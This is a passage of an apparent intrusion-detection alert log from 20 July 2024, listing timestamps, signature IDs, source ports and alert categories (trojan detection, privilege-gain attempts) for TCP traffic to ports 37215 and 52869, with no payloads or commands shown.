                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:52380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2835222
                      Source Port:45482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2027339
                      Source Port:41014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:41.032515
                      SID:2025132
                      Source Port:44618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.169339
                      SID:2829579
                      Source Port:49434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2835222
                      Source Port:43800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2027339
                      Source Port:53376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:26.791106
                      SID:2027339
                      Source Port:49314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222164
                      SID:2835222
                      Source Port:51548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.249014
                      SID:2025132
                      Source Port:37622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:20.472956
                      SID:2025132
                      Source Port:37844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2025132
                      Source Port:36920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:34126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.904266
                      SID:2027339
                      Source Port:35818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.170156
                      SID:2027339
                      Source Port:40232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.181357
                      SID:2027339
                      Source Port:38326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.095115
                      SID:2027339
                      Source Port:35686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:39306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.937783
                      SID:2831300
                      Source Port:36150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2835222
                      Source Port:37338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2835222
                      Source Port:36920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:43802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2027339
                      Source Port:51268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2027339
                      Source Port:42662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.569319
                      SID:2025132
                      Source Port:51334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2835222
                      Source Port:47230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.988854
                      SID:2027339
                      Source Port:40898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.349768
                      SID:2025132
                      Source Port:34456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.839288
                      SID:2025132
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.819848
                      SID:2027339
                      Source Port:38288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2829579
                      Source Port:35460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.106165
                      SID:2831300
                      Source Port:45766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.574571
                      SID:2027339
                      Source Port:36666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.877228
                      SID:2027339
                      Source Port:39966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:45012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:36600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2831300
                      Source Port:48996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.422220
                      SID:2027339
                      Source Port:44736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:44342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.171350
                      SID:2025132
                      Source Port:44834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.714716
                      SID:2831300
                      Source Port:43626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.125263
                      SID:2027339
                      Source Port:57470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.137774
                      SID:2025132
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.611005
                      SID:2831300
                      Source Port:42480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:43956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.290002
                      SID:2835222
                      Source Port:34556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.193367
                      SID:2027339
                      Source Port:34414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2027339
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.252357
                      SID:2025132
                      Source Port:45926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:51614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333070
                      SID:2027339
                      Source Port:56100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.108909
                      SID:2831300
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.601040
                      SID:2027339
                      Source Port:34250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.999179
                      SID:2831300
                      Source Port:43092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2027339
                      Source Port:58402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.763318
                      SID:2025132
                      Source Port:46986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2027339
                      Source Port:54142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.335084
                      SID:2025132
                      Source Port:57196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.660516
                      SID:2027339
                      Source Port:48318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.650744
                      SID:2831300
                      Source Port:56526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:39608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.297941
                      SID:2027339
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2831300
                      Source Port:42420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.906061
                      SID:2025132
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.702437
                      SID:2027339
                      Source Port:36972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:60054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.165362
                      SID:2027339
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2831300
                      Source Port:49444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.340422
                      SID:2025132
                      Source Port:56000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:38946
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2027339
                      Source Port:58820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.107223
                      SID:2027339
                      Source Port:36048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2829579
                      Source Port:35116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:48344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.489542
                      SID:2025132
                      Source Port:44408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2027339
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:46780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:39140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2027339
                      Source Port:38140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.090583
                      SID:2025132
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2835222
                      Source Port:43176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.182071
                      SID:2831300
                      Source Port:35410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.919746
                      SID:2025132
                      Source Port:53294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.509837
                      SID:2025132
                      Source Port:38436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2829579
                      Source Port:58716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.323363
                      SID:2025132
                      Source Port:49010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.525770
                      SID:2027339
                      Source Port:36520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.405709
                      SID:2027339
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.963505
                      SID:2027339
                      Source Port:47468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.320867
                      SID:2025132
                      Source Port:38554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2025132
                      Source Port:41888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.083668
                      SID:2831300
                      Source Port:39426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.396073
                      SID:2025132
                      Source Port:52322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2025132
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2027339
                      Source Port:58076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2027339
                      Source Port:35806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:55554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2027339
                      Source Port:60750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.443306
                      SID:2027339
                      Source Port:51260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:54504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.107634
                      SID:2027339
                      Source Port:45970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.275864
                      SID:2831300
                      Source Port:42096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221017
                      SID:2829579
                      Source Port:59050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:40992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592141
                      SID:2027339
                      Source Port:53584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.995803
                      SID:2831300
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2027339
                      Source Port:47380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.933453
                      SID:2831300
                      Source Port:33282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.621030
                      SID:2027339
                      Source Port:49174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641803
                      SID:2829579
                      Source Port:47368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:23.872117
                      SID:2027339
                      Source Port:46058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.300183
                      SID:2027339
                      Source Port:34640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:39754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.305781
                      SID:2025132
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.599519
                      SID:2027339
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.261793
                      SID:2831300
                      Source Port:39266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.258882
                      SID:2025132
                      Source Port:48378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2027339
                      Source Port:55122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.631848
                      SID:2025132
                      Source Port:59006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:44106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.165954
                      SID:2027339
                      Source Port:45156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2835222
                      Source Port:45076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2027339
                      Source Port:35238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.534135
                      SID:2025132
                      Source Port:46008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2829579
                      Source Port:58124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.702732
                      SID:2027339
                      Source Port:44592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2831300
                      Source Port:36560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2829579
                      Source Port:58330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.605496
                      SID:2025132
                      Source Port:44080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.297644
                      SID:2831300
                      Source Port:33012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.629075
                      SID:2025132
                      Source Port:36186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:60714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2829579
                      Source Port:60452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.147840
                      SID:2027339
                      Source Port:59216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:33112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.477986
                      SID:2025132
                      Source Port:45052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.813013
                      SID:2027339
                      Source Port:55664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.863393
                      SID:2027339
                      Source Port:52952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2027339
                      Source Port:38526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:55584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.380677
                      SID:2025132
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.868779
                      SID:2025132
                      Source Port:54574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:48740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.042994
                      SID:2027339
                      Source Port:44160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.215598
                      SID:2027339
                      Source Port:49828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809185
                      SID:2025132
                      Source Port:52892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.938818
                      SID:2829579
                      Source Port:49236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.300793
                      SID:2831300
                      Source Port:47466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.898102
                      SID:2831300
                      Source Port:49404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.288217
                      SID:2027339
                      Source Port:48756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2027339
                      Source Port:36906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.746309
                      SID:2027339
                      Source Port:40366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.710739
                      SID:2025132
                      Source Port:44082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2831300
                      Source Port:39142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.971751
                      SID:2027339
                      Source Port:39120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:51176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.280928
                      SID:2027339
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.810783
                      SID:2025132
                      Source Port:46080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.038410
                      SID:2831300
                      Source Port:45320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.197215
                      SID:2027339
                      Source Port:52982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.079349
                      SID:2025132
                      Source Port:48408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:56022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2027339
                      Source Port:33716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.464448
                      SID:2025132
                      Source Port:44136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:45528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.944701
                      SID:2027339
                      Source Port:59102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.310738
                      SID:2025132
                      Source Port:48768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2025132
                      Source Port:51320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.287237
                      SID:2027339
                      Source Port:44008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2835222
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2027339
                      Source Port:57818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2831300
                      Source Port:38826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.089365
                      SID:2027339
                      Source Port:56670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.738721
                      SID:2025132
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.387027
                      SID:2027339
                      Source Port:56974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.970191
                      SID:2025132
                      Source Port:49902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.043880
                      SID:2829579
                      Source Port:49064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2027339
                      Source Port:39258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2027339
                      Source Port:60180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2027339
                      Source Port:38322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.455918
                      SID:2025132
                      Source Port:36932
